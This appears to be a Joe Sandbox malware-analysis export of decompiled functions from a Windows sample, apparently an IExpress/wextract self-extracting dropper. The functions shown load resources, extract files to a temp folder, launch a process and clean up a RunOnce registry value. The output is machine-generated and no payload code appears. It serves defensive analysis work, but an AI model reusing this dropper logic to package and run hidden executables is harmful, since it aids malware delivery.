0x0040406e
0x00404070
0x00404077
0x0040407f
0x00404089
0x0040408b
0x0040408b
0x00404089
0x00404077
0x00404091
0x0040409c
0x004040a8
0x004040b8
0x00000000
0x004040c2
0x00000000
0x004040c2

APIs

CreateProcessA.KERNELBASE ref: 00404033
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404049
GetExitCodeProcess.KERNELBASE ref: 0040405C
CloseHandle.KERNEL32(?), ref: 0040409C
CloseHandle.KERNEL32(?), ref: 004040A8
GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 004040DC
FormatMessageA.KERNELBASE(00001000,00000000,00000000), ref: 004040E9

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
String ID:
API String ID: 3183975587-0
Opcode ID: c33a7784897af704f97ccb375b736f5f528657ed17549b8f0599f9aa640b82fa
Instruction ID: f55851d03d85abb9b2f3690b68a1bd7c8abf884a38cd72d7ac8736cd390e9c04
Opcode Fuzzy Hash: c33a7784897af704f97ccb375b736f5f528657ed17549b8f0599f9aa640b82fa
Instruction Fuzzy Hash: 3431ADB1640218ABEB209F65DD4CFAB7778EBD4714F1041BAFA45F62A1CA344C81CE29

Uniqueness

Uniqueness Score: -1.00%

Function 004051E5 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 74
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004051E5(void* __eflags) {
				int _t5;
				void* _t6;
				void* _t28;

				_t1 = E0040468F("UPROMPT", 0, 0) + 1; // 0x1
				_t28 = LocalAlloc(0x40, _t1);
				if(_t28 != 0) {
					if(E0040468F("UPROMPT", _t28, _t29) != 0) {
						_t5 = lstrcmpA(_t28, "<None>"); // executed
						if(_t5 != 0) {
							_t6 = E004044B9(0, 0x3e9, _t28, 0, 0x20, 4);
							LocalFree(_t28);
							if(_t6 != 6) {
								 *0x409124 = 0x800704c7;
								L10:
								return 0;
							}
							 *0x409124 = 0;
							L6:
							return 1;
						}
						LocalFree(_t28);
						goto L6;
					}
					E004044B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree(_t28);
					 *0x409124 = 0x80070714;
					goto L10;
				}
				E004044B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0x409124 = E00406285();
				goto L10;
			}

0x004051fb
0x00405207
0x0040520b
0x0040523c
0x00405268
0x00405270
0x0040528b
0x00405293
0x0040529c
0x004052a6
0x004052b0
0x00000000
0x004052b0
0x0040529e
0x00405279
0x00000000
0x0040527b
0x00405273
0x00000000
0x00405273
0x0040524a
0x00405250
0x00405256
0x00000000
0x00405256
0x00405219
0x00405223
0x00000000

APIs

Part of subcall function 0040468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046A0
Part of subcall function 0040468F: SizeofResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046A9
Part of subcall function 0040468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046C3
Part of subcall function 0040468F: LoadResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046CC
Part of subcall function 0040468F: LockResource.KERNEL32(00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046D3
Part of subcall function 0040468F: memcpy_s.MSVCRT ref: 004046E5
Part of subcall function 0040468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 004046EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00402F4D,?,00000002,00000000), ref: 00405201
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00405250

Part of subcall function 004044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00404518
Part of subcall function 004044B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00404554

Part of subcall function 00406285: GetLastError.KERNEL32(00405BBC), ref: 00406285

Strings

UPROMPT, xrefs: 004051EF, 00405230
<None>, xrefs: 00405262

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
String ID: <None>$UPROMPT
API String ID: 957408736-2980973527
Opcode ID: e3db67eab3910edaea3737147de99a2175cce266038d5d97a37fd31f5e8d6ee5
Instruction ID: 09f94c95ee8dde742b6e9a7adb48e62a9eab8c8aba96d5021a361f4290a7392f
Opcode Fuzzy Hash: e3db67eab3910edaea3737147de99a2175cce266038d5d97a37fd31f5e8d6ee5
Instruction Fuzzy Hash: 2211E2B5300205ABE3286B725E49F3B619DDFC8394B10447FBB02F62E0DABD8C11492D

Uniqueness

Uniqueness Score: -1.00%

Function 004052B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E004052B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				char _v268;
				signed int _t9;
				signed int _t11;
				void* _t21;
				void* _t29;
				CHAR** _t31;
				void* _t32;
				signed int _t33;

				_t28 = __edi;
				_t22 = __ecx;
				_t21 = __ebx;
				_t9 =  *0x408004; // 0x7980a54a
				_v8 = _t9 ^ _t33;
				_push(__esi);
				_t31 =  *0x4091e0; // 0x4ead3c8
				if(_t31 != 0) {
					_push(__edi);
					do {
						_t29 = _t31;
						if( *0x408a24 == 0 &&  *0x409a30 == 0) {
							SetFileAttributesA( *_t31, 0x80); // executed
							DeleteFileA( *_t31); // executed
						}
						_t31 = _t31[1];
						LocalFree( *_t29);
						LocalFree(_t29);
					} while (_t31 != 0);
					_pop(_t28);
				}
				_t11 =  *0x408a20; // 0x0
				_pop(_t32);
				if(_t11 != 0 &&  *0x408a24 == 0 &&  *0x409a30 == 0) {
					_push(_t22);
					E00401781( &_v268, 0x104, _t22, "C:\Users\jones\AppData\Local\Temp\IXP000.TMP\");
					if(( *0x409a34 & 0x00000020) != 0) {
						E004065E8( &_v268);
					}
					SetCurrentDirectoryA(".."); // executed
					_t22 =  &_v268;
					E00402390( &_v268);
					_t11 =  *0x408a20; // 0x0
				}
				if( *0x409a40 != 1 && _t11 != 0) {
					_t11 = E00401FE1(_t22); // executed
				}
				 *0x408a20 =  *0x408a20 & 0x00000000;
				return E00406CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
			}

0x004052b6
0x004052b6
0x004052b6
0x004052c1
0x004052c8
0x004052cb
0x004052cc
0x004052d4
0x004052d6
0x004052d7
0x004052de
0x004052e0
0x004052f2
0x004052fa
0x004052fa
0x00405302
0x00405305
0x0040530c
0x00405312
0x00405316
0x00405316
0x00405317
0x0040531c
0x0040531f
0x00405333
0x00405345
0x00405351
0x00405359
0x00405359
0x00405363
0x00405369
0x0040536f
0x00405374
0x00405374
0x00405381
0x00405387
0x00405387
0x0040538f
0x004053a0

APIs

SetFileAttributesA.KERNELBASE(04EAD3C8,00000080,?,00000000), ref: 004052F2
DeleteFileA.KERNELBASE(04EAD3C8), ref: 004052FA
LocalFree.KERNEL32(04EAD3C8,?,00000000), ref: 00405305
LocalFree.KERNEL32(04EAD3C8), ref: 0040530C
SetCurrentDirectoryA.KERNELBASE(004011FC,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00405363

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00405334

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
API String ID: 2833751637-305352358
Opcode ID: 0ac7930ffb9e2ea93b9501b38ef617429c3f56ca169f26fd8768bff6fd321f03
Instruction ID: a399f6850f9857e4a2a636118a1f1a303e38fc590d24b9381051fc2fad193b26
Opcode Fuzzy Hash: 0ac7930ffb9e2ea93b9501b38ef617429c3f56ca169f26fd8768bff6fd321f03
Instruction Fuzzy Hash: 43217C31600618DBDB24AB24EE09B6A77A4EB14754F04017EE882766E1CBB85D94CF5C

Uniqueness

Uniqueness Score: -1.00%

Function 00401FE1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401FE1(void* __ecx) {
				void* _v8;
				long _t4;

				if( *0x408530 != 0) {
					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
					if(_t4 == 0) {
						RegDeleteValueA(_v8, "wextract_cleanup0"); // executed
						return RegCloseKey(_v8);
					}
				}
				return _t4;
			}

0x00401fee
0x00402005
0x0040200d
0x00402017
0x00000000
0x00402020
0x0040200d
0x00402029

APIs

RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,0040538C,?,?,0040538C), ref: 00402005
RegDeleteValueA.KERNELBASE(0040538C,wextract_cleanup0,?,?,0040538C), ref: 00402017
RegCloseKey.ADVAPI32(0040538C,?,?,0040538C), ref: 00402020

Strings

wextract_cleanup0, xrefs: 00401FE7, 0040200F
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00401FFB

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
API String ID: 849931509-702805525
Opcode ID: 4a4bbfe9345666091a03c04c6406ee07b10a2f14f218e9796807bdc021751f89
Instruction ID: 964837390bdcfb9f7028471f109179f02a98b209a827bd19e41bd068bc92d2f3
Opcode Fuzzy Hash: 4a4bbfe9345666091a03c04c6406ee07b10a2f14f218e9796807bdc021751f89
Instruction Fuzzy Hash: F4E04F31950318BBD7218F90EF0EF5A7B2DE700744F2001BABA04B01E0EBB65A24D60D

Uniqueness

Uniqueness Score: -1.00%

Function 00404CD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 146
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00404CD0(char* __edx, long _a4, int _a8) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				int _t30;
				long _t32;
				signed int _t33;
				long _t35;
				long _t36;
				struct HWND__* _t37;
				long _t38;
				long _t39;
				long _t41;
				long _t44;
				long _t45;
				long _t46;
				signed int _t50;
				long _t51;
				char* _t58;
				long _t59;
				char* _t63;
				long _t64;
				CHAR* _t71;
				CHAR* _t74;
				int _t75;
				signed int _t76;

				_t69 = __edx;
				_t29 =  *0x408004; // 0x7980a54a
				_t30 = _t29 ^ _t76;
				_v8 = _t30;
				_t75 = _a8;
				if( *0x4091d8 == 0) {
					_t32 = _a4;
					__eflags = _t32;
					if(_t32 == 0) {
						_t33 = E00404E99(_t75);
						L35:
						return E00406CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
					}
					_t35 = _t32 - 1;
					__eflags = _t35;
					if(_t35 == 0) {
						L9:
						_t33 = 0;
						goto L35;
					}
					_t36 = _t35 - 1;
					__eflags = _t36;
					if(_t36 == 0) {
						_t37 =  *0x408584; // 0x0
						__eflags = _t37;
						if(_t37 != 0) {
							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
						}
						_t54 = 0x4091e4;
						_t58 = 0x4091e4;
						do {
							_t38 =  *_t58;
							_t58 =  &(_t58[1]);
							__eflags = _t38;
						} while (_t38 != 0);
						_t59 = _t58 - 0x4091e5;
						__eflags = _t59;
						_t71 =  *(_t75 + 4);
						_t73 =  &(_t71[1]);
						do {
							_t39 =  *_t71;
							_t71 =  &(_t71[1]);
							__eflags = _t39;
						} while (_t39 != 0);
						_t69 = _t71 - _t73;
						_t30 = _t59 + 1 + _t71 - _t73;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							L3:
							_t33 = _t30 | 0xffffffff;
							goto L35;
						}
						_t69 = 0x4091e4;
						_t30 = E00404702( &_v268, 0x4091e4,  *(_t75 + 4));
						__eflags = _t30;
						if(__eflags == 0) {
							goto L3;
						}
						_t41 = E0040476D( &_v268, __eflags);
						__eflags = _t41;
						if(_t41 == 0) {
							goto L9;
						}
						_push(0x180);
						_t30 = E00404980( &_v268, 0x8302); // executed
						_t75 = _t30;
						__eflags = _t75 - 0xffffffff;
						if(_t75 == 0xffffffff) {
							goto L3;
						}
						_t30 = E004047E0( &_v268);
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						 *0x4093f4 =  *0x4093f4 + 1;
						_t33 = _t75;
						goto L35;
					}
					_t44 = _t36 - 1;
					__eflags = _t44;
					if(_t44 == 0) {
						_t54 = 0x4091e4;
						_t63 = 0x4091e4;
						do {
							_t45 =  *_t63;
							_t63 =  &(_t63[1]);
							__eflags = _t45;
						} while (_t45 != 0);
						_t74 =  *(_t75 + 4);
						_t64 = _t63 - 0x4091e5;
						__eflags = _t64;
						_t69 =  &(_t74[1]);
						do {
							_t46 =  *_t74;
							_t74 =  &(_t74[1]);
							__eflags = _t46;
						} while (_t46 != 0);
						_t73 = _t74 - _t69;
						_t30 = _t64 + 1 + _t74 - _t69;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							goto L3;
						}
						_t69 = 0x4091e4;
						_t30 = E00404702( &_v268, 0x4091e4,  *(_t75 + 4));
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						_t69 =  *((intOrPtr*)(_t75 + 0x18));
						_t30 = E00404C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						E00404B60( *((intOrPtr*)(_t75 + 0x14))); // executed
						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
						__eflags = _t50;
						if(_t50 != 0) {
							_t51 = _t50 & 0x00000027;
							__eflags = _t51;
						} else {
							_t51 = 0x80;
						}
						_t30 = SetFileAttributesA( &_v268, _t51); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						} else {
							_t33 = 1;
							goto L35;
						}
					}
					_t30 = _t44 - 1;
					__eflags = _t30;
					if(_t30 == 0) {
						goto L3;
					}
					goto L9;
				}
				if(_a4 == 3) {
					_t30 = E00404B60( *((intOrPtr*)(_t75 + 0x14)));
				}
				goto L3;
			}

0x00404cd0
0x00404cdb
0x00404ce0
0x00404ce2
0x00404cee
0x00404cf2
0x00404d0e
0x00404d0e
0x00404d11
0x00404e83
0x00404e88
0x00404e98
0x00404e98
0x00404d17
0x00404d17
0x00404d1a
0x00404d2f
0x00404d2f
0x00000000
0x00404d2f
0x00404d1c
0x00404d1c
0x00404d1f
0x00404dcb
0x00404dd0
0x00404dd2
0x00404ddd
0x00404ddd
0x00404de3
0x00404de8
0x00404ded
0x00404ded
0x00404def
0x00404df0
0x00404df0
0x00404df4
0x00404df4
0x00404df6
0x00404df9
0x00404dfc
0x00404dfc
0x00404dfe
0x00404dff
0x00404dff
0x00404e03
0x00404e08
0x00404e0a
0x00404e0f
0x00404d03
0x00404d03
0x00000000
0x00404d03
0x00404e18
0x00404e20
0x00404e25
0x00404e27
0x00000000
0x00000000
0x00404e33
0x00404e38
0x00404e3a
0x00000000
0x00000000
0x00404e40
0x00404e51
0x00404e56
0x00404e5b
0x00404e5e
0x00000000
0x00000000
0x00404e6a
0x00404e6f
0x00404e71
0x00000000
0x00000000
0x00404e77
0x00404e7d
0x00000000
0x00404e7d
0x00404d25
0x00404d25
0x00404d28
0x00404d36
0x00404d3b
0x00404d40
0x00404d40
0x00404d42
0x00404d43
0x00404d43
0x00404d47
0x00404d4a
0x00404d4a
0x00404d4c
0x00404d4f
0x00404d4f
0x00404d51
0x00404d52
0x00404d52
0x00404d56
0x00404d5b
0x00404d5d
0x00404d62
0x00000000
0x00000000
0x00404d67
0x00404d6f
0x00404d74
0x00404d76
0x00000000
0x00000000
0x00404d7c
0x00404d84
0x00404d89
0x00404d8b
0x00000000
0x00000000
0x00404d94
0x00404d99
0x00404d9e
0x00404da1
0x00404daa
0x00404daa
0x00404da3
0x00404da3
0x00404da3
0x00404db5
0x00404dbb
0x00404dbd
0x00000000
0x00404dc3
0x00404dc5
0x00000000
0x00404dc5
0x00404dbd
0x00404d2a
0x00404d2a
0x00404d2d
0x00000000
0x00000000
0x00000000
0x00404d2d
0x00404cf8
0x00404cfd
0x00404d02
0x00000000

APIs

SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00404DB5
SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00404DDD

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00404D36, 00404DE3

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: AttributesFileItemText
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
API String ID: 3625706803-305352358
Opcode ID: 257c9b6a3856b41c8a69c04874ddfb44c6bdef15d5f4cd6bd326d1538e73eac5
Instruction ID: 31e8ee9ec96c77640c407dc2e3c45d8f9ad1bcb24b75663886ce4ee65fd8817f
Opcode Fuzzy Hash: 257c9b6a3856b41c8a69c04874ddfb44c6bdef15d5f4cd6bd326d1538e73eac5
Instruction Fuzzy Hash: 244123B62001019BCB219F38ED446B673A5AFC5304B04467FDE86B72D1DA39DE4AC798

Uniqueness

Uniqueness Score: -1.00%

Function 00404C37 Relevance: 4.5, APIs: 3, Instructions: 39
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404C37(signed int __ecx, int __edx, int _a4) {
				struct _FILETIME _v12;
				struct _FILETIME _v20;
				FILETIME* _t14;
				int _t15;
				signed int _t21;

				_t21 = __ecx * 0x18;
				if( *((intOrPtr*)(_t21 + 0x408d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
					L5:
					return 0;
				} else {
					_t14 =  &_v12;
					_t15 = SetFileTime( *(_t21 + 0x408d74), _t14, _t14, _t14); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 1;
				}
			}

0x00404c40
0x00404c4a
0x00404c8d
0x00000000
0x00404c70
0x00404c70
0x00404c7e
0x00404c86
0x00000000
0x00000000
0x00000000
0x00404c8a

APIs

DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00404C54
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00404C66
SetFileTime.KERNELBASE(?,?,?,?), ref: 00404C7E

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: Time$File$DateLocal
String ID:
API String ID: 2071732420-0
Opcode ID: de3d8c8ad82764a1cfb484c9646f0635e09601b8f48d0e66528622655dc2b5f2
Instruction ID: 26a6f2e907af393bf0761dda356fb09445650c1bae6419f8d7bc6e601a313ac9
Opcode Fuzzy Hash: de3d8c8ad82764a1cfb484c9646f0635e09601b8f48d0e66528622655dc2b5f2
Instruction Fuzzy Hash: BEF090B260520CAFFB24DFB4CD48DBB77ACEB44250B44453FAA16E11D0EA34D924C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 0040487A Relevance: 3.1, APIs: 2, Instructions: 59
fileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0040487A(CHAR* __ecx, signed int __edx) {
				void* _t7;
				CHAR* _t11;
				long _t18;
				long _t23;

				_t11 = __ecx;
				asm("sbb edi, edi");
				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
				if((__edx & 0x00000100) == 0) {
					asm("sbb esi, esi");
					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
				} else {
					if((__edx & 0x00000400) == 0) {
						asm("sbb esi, esi");
						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
					} else {
						_t23 = 1;
					}
				}
				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
				if(_t7 != 0xffffffff || _t23 == 3) {
					return _t7;
				} else {
					E0040490C(_t11);
					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
				}
			}

0x00404880
0x0040488c
0x00404894
0x004048a0
0x004048c9
0x004048ce
0x004048a2
0x004048a8
0x004048b7
0x004048bc
0x004048aa
0x004048ac
0x004048ac
0x004048a8
0x004048de
0x004048e7
0x0040490b
0x004048ee
0x004048f0
0x00000000
0x00404902

APIs

CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00404A23,?,00404F67,*MEMCAB,00008000,00000180), ref: 004048DE
CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00404F67,*MEMCAB,00008000,00000180), ref: 00404902

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: fadf226ed69bbb41dbb50a9d93363128b59b8e1147c1ebbdb1745835005b5b17
Instruction ID: dce78edff5e7a467645b78d59c04aaa4689d7eeda0cc1ba10610c6ef675d671e
Opcode Fuzzy Hash: fadf226ed69bbb41dbb50a9d93363128b59b8e1147c1ebbdb1745835005b5b17
Instruction Fuzzy Hash: B00128E7E116702AF22450294C88FB7551C8BD6634F1A4736BEAABA2D2D5784C0481E8

Uniqueness

Uniqueness Score: -1.00%

Function 00404AD0 Relevance: 3.0, APIs: 2, Instructions: 47
fileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00404AD0(signed int _a4, void* _a8, long _a12) {
				signed int _t9;
				int _t12;
				signed int _t14;
				signed int _t15;
				void* _t20;
				struct HWND__* _t21;
				signed int _t24;
				signed int _t25;

				_t20 =  *0x40858c; // 0x154
				_t9 = E00403680(_t20);
				if( *0x4091d8 == 0) {
					_push(_t24);
					_t12 = WriteFile( *(0x408d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
					if(_t12 != 0) {
						_t25 = _a12;
						if(_t25 != 0xffffffff) {
							_t14 =  *0x409400; // 0x10a200
							_t15 = _t14 + _t25;
							 *0x409400 = _t15;
							if( *0x408184 != 0) {
								_t21 =  *0x408584; // 0x0
								if(_t21 != 0) {
									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x4093f8, 0);
								}
							}
						}
					} else {
						_t25 = _t24 | 0xffffffff;
					}
					return _t25;
				} else {
					return _t9 | 0xffffffff;
				}
			}

0x00404ad5
0x00404adb
0x00404ae7
0x00404aee
0x00404b05
0x00404b0d
0x00404b14
0x00404b1a
0x00404b1c
0x00404b21
0x00404b2a
0x00404b2f
0x00404b31
0x00404b39
0x00404b54
0x00404b54
0x00404b39
0x00404b2f
0x00404b0f
0x00404b0f
0x00404b0f
0x00404b5e
0x00404ae9
0x00404aed
0x00404aed

APIs

Part of subcall function 00403680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0040369F
Part of subcall function 00403680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 004036B2
Part of subcall function 00403680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 004036DA

WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00404B05

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: MessagePeek$FileMultipleObjectsWaitWrite
String ID:
API String ID: 1084409-0
Opcode ID: ab6259a8a4d2dd022a3c8d33f5e1e8a15f83e3210f04ee4509b3a011844fb6d6
Instruction ID: 7cceea35d73159b26d1b83d1328ee4e94251b7085b3a179f835f58e33a962e09
Opcode Fuzzy Hash: ab6259a8a4d2dd022a3c8d33f5e1e8a15f83e3210f04ee4509b3a011844fb6d6
Instruction Fuzzy Hash: 74018071200205ABDB149F59DE05BA27769AB84725F04823AFA39BB2E1CB74DC11CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040658A Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040658A(char* __ecx, void* __edx, char* _a4) {
				intOrPtr _t4;
				char* _t6;
				char* _t8;
				void* _t10;
				void* _t12;
				char* _t16;
				intOrPtr* _t17;
				void* _t18;
				char* _t19;

				_t16 = __ecx;
				_t10 = __edx;
				_t17 = __ecx;
				_t1 = _t17 + 1; // 0x408b3f
				_t12 = _t1;
				do {
					_t4 =  *_t17;
					_t17 = _t17 + 1;
				} while (_t4 != 0);
				_t18 = _t17 - _t12;
				_t2 = _t18 + 1; // 0x408b40
				if(_t2 < __edx) {
					_t19 = _t18 + __ecx;
					if(_t19 > __ecx) {
						_t8 = CharPrevA(__ecx, _t19); // executed
						if( *_t8 != 0x5c) {
							 *_t19 = 0x5c;
							_t19 =  &(_t19[1]);
						}
					}
					_t6 = _a4;
					 *_t19 = 0;
					while( *_t6 == 0x20) {
						_t6 = _t6 + 1;
					}
					return E004016B3(_t16, _t10, _t6);
				}
				return 0x8007007a;
			}

0x00406592
0x00406594
0x00406596
0x00406598
0x00406598
0x0040659b
0x0040659b
0x0040659d
0x0040659e
0x004065a2
0x004065a4
0x004065a9
0x004065b2
0x004065b6
0x004065ba
0x004065c3
0x004065c5
0x004065c8
0x004065c8
0x004065c3
0x004065c9
0x004065cc
0x004065d2
0x004065d1
0x004065d1
0x00000000
0x004065dc
0x00000000

APIs

CharPrevA.USER32(00408B3E,00408B3F,00000001,00408B3E,-00000003,?,004060EC,00401140,?), ref: 004065BA

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: CharPrev
String ID:
API String ID: 122130370-0
Opcode ID: b08d9a994ba15229853f1fb0455e3b44e106027da8ecf514dd4033e1e77c22ce
Instruction ID: 40dc54a50ef1d9b939454141e84776cfaea9ff212e965cea6d62fa9ba78ea7d4
Opcode Fuzzy Hash: b08d9a994ba15229853f1fb0455e3b44e106027da8ecf514dd4033e1e77c22ce
Instruction Fuzzy Hash: B3F02D32104250BFD3314919BC84B67BFDD9B86350F16017FE8DBA3385CA7D4D5682A9

Uniqueness

Uniqueness Score: -1.00%

Function 0040621E Relevance: 1.5, APIs: 1, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040621E() {
				signed int _v8;
				char _v268;
				signed int _t5;
				void* _t9;
				void* _t13;
				void* _t19;
				void* _t20;
				signed int _t21;

				_t5 =  *0x408004; // 0x7980a54a
				_v8 = _t5 ^ _t21;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					0x4f0 = 2;
					_t9 = E0040597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
				} else {
					E004044B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
					 *0x409124 = E00406285();
					_t9 = 0;
				}
				return E00406CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
			}

0x00406229
0x00406230
0x00406247
0x0040626a
0x00406272
0x00406249
0x00406255
0x0040625f
0x00406264
0x00406264
0x00406284

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040623F

Part of subcall function 004044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00404518
Part of subcall function 004044B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00404554

